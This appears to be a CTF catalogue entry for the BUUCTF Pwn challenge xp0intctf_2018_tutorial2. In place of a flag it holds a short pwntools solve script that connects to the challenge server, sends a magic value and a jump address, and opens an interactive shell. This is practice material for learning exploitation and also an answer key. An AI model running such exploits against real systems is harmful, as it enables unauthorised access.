| ID: | 8780 |
|---|---|
| 标题: | xp0intctf_2018_tutorial2 |
| 描述: | Ubuntu 18 https://github.com/hebtuerror404 |
| 类型: | Pwn |
| 网站: | BUUCTF |
| 题目链接: | https://buuoj.cn/challenges#xp0intctf_2018_tutorial2 |
| 赛事: | None |
| 年度: | None |
| Flag值: | xp0intctf_2018_tutorial2的解题脚本为: from pwn import * context(log_level='debug') io=remote("node3.buuoj.cn",26963) io.recv() io.send(p32(0xdeadbeef)) io.recv() io.send(p32(0x4006e6)) io.recv() io.interactive() |
| writeup: | https://blog.csdn.net/stareforever/article/details/114629192 |